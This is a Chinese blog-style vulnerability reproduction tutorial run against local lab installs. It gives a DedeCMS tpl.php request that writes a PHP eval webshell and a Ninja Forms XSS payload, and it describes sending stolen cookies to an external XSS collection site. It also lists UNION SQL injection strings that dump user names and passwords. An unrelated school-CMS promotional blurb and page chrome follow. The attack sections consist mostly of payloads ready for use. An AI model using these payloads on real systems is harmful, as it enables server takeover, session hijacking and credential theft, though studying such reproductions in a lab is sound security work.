CMS漏洞复现

dedeCMS (CNVD-2018-01221)

类型:

php类cms系统:dedecms、帝国cms、php168、phpcms、cmstop、discuz、phpwind等
asp类cms系统:zblog、KingCMS等
国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。

dedeCMS (CNVD-2018-01221)

漏洞简介
Dedecms v5.7 sp2版本tpl.php存在代码执行漏洞,攻击者可以利用该漏洞在增加的新的标签中上传木马

 

else if($action=='savetagfile')
{
    csrf_check();
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('文件名不合法,不允许进行操作!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    $content = stripslashes($content);
    $truefile = DEDEINC.'/taglib/'.$filename;
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);

 

 

 

首先我们打开tpl.php文件后,找到指定目录,还有在PHP代码里发现了参数,我们把他get下来,复制到URL里面,发现要上传东西,我们首先要尝试随便传个,Ctrl+u查看源码,发现

 

除此之外我们还发现另外一个参数,感觉有用把他也get下来

我们首先要尝试随便传个,Ctrl+u查看源码,发现 token的意思是“令牌”,是服务端生成的一串字符串,作为客户端进行请求的一个标识。把这个参数也get下来,并且赋值,

 

 再加上个一句话木马,

最后得到如下

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/tpl.php?action=savetagfile&token=db3b7aab1cdd04a0ff498b6b369caec7&filename=123.lib.php&content=<?php @eval($_POST["hello"]);?>

然后打开菜刀,右键添加,在地址上面,本地IP加目录路径和创建的PHP文件名,点击添加,打开文档就OK

Wordpress (CVE-2018-19287)

环境搭建好了之后,打开网站根目录的url点击插件的已安装插件,启用Ninja Forms,

打开这个网站,发现有一个弹窗,但是弹窗不是目的,只是证明这个网站存在xss漏洞,

http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1"><script>alert(/POC3/);</script>&nf_form_filter&paged=1

 

http://www.l31.cc/index.php

 

这个xss后台,进去之后,创建项目,

把这个xss复制上去,成功。

 

查看xss。项目详情,就看到了cookie,

sql注入。。。

进入SQL命令行,

应该记住在网页上要先获取库名----->表名------>字段名------>最终的值

information_schema  
-tables  
-- table_name tables表中的字段名,存放着其他数据库中的表的名字

-columns
--columns_name tables表中的字段名,存放着其他数据库中的表的名字

-- table_schema 指定数据库,

database() mysql下的函数,表示当前数据库名


information_schema.tables

concat(table_name) from information_schema.tables where table_schema=database();  ‘security’

 

获得表名 

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+

获得所有用户名

?id=-1' union select 1,2,group_concat(username) from security.users--+

获得字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

获得所有密码  

?id=-1' union select 1,2,group_concat(password) from security.users--+

  • 4
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
国微CMS学校网站系统是一个以php MySQL进行开发的学校网站系统。国微学校方案重点为大学、中学、技校提供高性能解决方案,可快速将学校信息化迈入实用高效的水平。功能包括:精品课程系统、录取查询系统、学籍查询系统、教 师名录查询系统、招生系统、文章模块、视频模块、图片模块、下载模块、问答系统、表单系统、在线办事系统、广告模块、服务反馈体系、手机群发平台、邮件群 发平台、用户体系、在线招聘平台、留言本等模块。 国微CMS学校网站系统(PHP168 S系列) v20180925 更新日志 1、新增可以自由开启内网和外网访问。 2、新增了每个栏目IP访问、内容IP访问控制。 3、搜索集约化处理;更加方便方向代理。 4、cook进行了加密。 5、其余10余项项目此安全优化。 国微CMS学校网站系统注意事项 1、后台超管添加附件类型得到控制,只允许 rar zip png jpg gif swf pdf doc docx xls xlsx mp4 flv CSV常规附件类型 2、后台编辑模板方面,如果网站完成,我们通过上传一个配置文件,就关闭掉后台编辑模板功能。如果要开启,需要进入服务器,开启才行。类似强制登陆那种模式。 3、后台登陆可以开启不断变化的验证码(安全码也保留)。 4、后台密码必须要8位(不影响现在的密码体系前提下,因为很多超管密码给分站管理员后,都改为简单容易记住的) 国微CMS学校网站系统功能 系统体系化 模块化体系:所有功能均已系统化、模块化、插件化,如CMS、问答、广告、标签 用户体系: 不仅区分企业、个人,并可自由添加角色组与角色,使其用户体系与实体一致。 权限体系: 所有功能模块封装并与权限匹配,可以细化至栏目对接角色管理权限。 标签体系: 常规标签、变量标签、标签后缀、标签缓存体系等已全面实施。 模板体系: 从方案模板、会员中心、系统模块模板、栏目、列表页面、内容页完全可独立选择。 积分体系: 积分兑换、积分消费、积分规则等已经开始在系统内实施。 菜单体系: 后台菜单、前台菜单、会员中心菜单均可自由添加和控制。 安全体系: 支持IP黑名单、白名单、支持防CC攻击、支持批量过滤敏感词汇。 通讯体系: 手机模块、邮件模块、短消息模块均已做成接口模式,任意功能均可方便调用。 程序整合体系:将支持PHPwind、UC、PHP168自身等系统整合,同时互动百科也将整合。   易用性: A、全部前台可视化操作,可视即可操作。 B、一键化应用:如一键安装、一键缓存、一键静态、一键更换模板。 C、标签样式不断增加,只需用鼠标选择想用的样式即可。 D、自由组装和拆卸模块与插件。 E、掌握时间1小时学会建站。 国微CMS学校网站系统前台页面 国微CMS学校网站系统后台管理 后台登陆路径:域名/admin.php  后台登陆用户名与密码是在安装过程中设置的,要谨记 后台页面   相关阅读 同类推荐:站长常用源码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值